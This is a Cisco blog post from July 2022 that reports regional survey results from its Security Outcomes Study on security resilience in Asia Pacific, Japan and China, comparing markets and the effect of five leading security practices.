Did you know that Cisco offers cybersecurity trainings and certifications? Start developing your cybersecurity skills today! And if you’re ready to jump into an exciting new career in security, check out the open roles at Cisco Secure and Duo Security.

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☐ ☆ ✇ Security – Cisco Blog

Security Resilience in APJC

By Cindy Valladares — July 19th 2022 at 12:00

As the world continues to face formidable challenges, one of the many things impacted is cybersecurity. While recent challenges have been varied, they have all contributed to great uncertainty. How can organizations stay strong and protect their environments amidst so much volatility?

Lately we’ve been talking a lot about security resilience, and how companies can embrace it to stay the course no matter what happens. By building a resilient security strategy, organizations can more effectively address unexpected disruptions and emerge stronger.

Through our Security Outcomes Study, Volume 2, we were able to benchmark how companies around the world are doing when it comes to cyber resilience. Recent blog posts have taken a look at security resilience in the EMEA and Americas regions, and this post assesses resilience in Asia Pacific, Japan and China (APJC).

While the Security Outcomes Study focuses on a dozen outcomes that contribute to overall security program success, for this analysis, we focused on four specific outcomes that are most critical for security resilience. These include: keeping up with the demands of the business, avoiding major cyber incidents, maintaining business continuity, and retaining talented personnel.

Security performance across the region

The following chart shows the proportion of organizations in each market within APJC that reported “excelling” in these four outcomes:

Market-level comparison of reported success levels for security resilience outcomes

There is a lot of movement in this chart, but if you take a closer look, you will see that many of the percentage differences between markets are quite small. For example, 44.9% of organizations in the Philippines reported that they are proficient at keeping up with the business, with Mainland China closely following at 44.4%.

The biggest difference we see between the top spot and the bottom spot is around retaining security talent—42.4% of organizations in Australia reported that they were successful in that area, while only 18.3% of organizations in Hong Kong reported the same.

Next, we looked at the mean resilience score for each market in the region:

Market-level comparison of mean security resilience score

When we look at this, we can see the differences between the top six and bottom seven markets a bit more clearly. However, as the previous chart also showed, the differences are very slight. (When we take into account the gray error bars, they become even more slight.)

There are many factors that could contribute to these small differences when it comes to security resilience. But the most important thing to be gleaned from this data is how each market can improve its respective resilience level.

Improving resilience in APJC

The Security Outcomes Study revealed the top five practices—what we refer to as “The Fab Five”—that make the most impact when it comes to enhancing security. The following chart outlines the Fab Five, and demonstrates how each market in the APJC region ranked its own strength across these practices.

Market-level comparison of reported success levels for Fab Five security practices

If we look at Thailand, for example, 69.1% of organizations say they are adept at accurate threat detection, while only 28% of organizations in Taiwan say the same. Like in the previous charts, there is a lot of movement between how various markets reported their performance against these practices. However, it’s interesting to note that Taiwan remained consistent.

So does implementing the Fab Five improve resilience across organizations in APJC? Looking at the chart below, it’s safe to say that, yes, implementing the Fab Five does improve resilience. Organizations in APJC that did not implement any of the Fab Five practices ranked in the bottom 30% for resilience, whereas those that reported strength in all five rose to the top 30%.

Effect of implementing five leading security practices on overall resilience score

Boost your organization’s cyber resilience

While building resilience can sometimes seem like an elusive concept, we hope this data provides some concrete benchmarks to strive for in today’s security programs.

For additional insight, check out our resilience web page and the full

Security Outcomes Study


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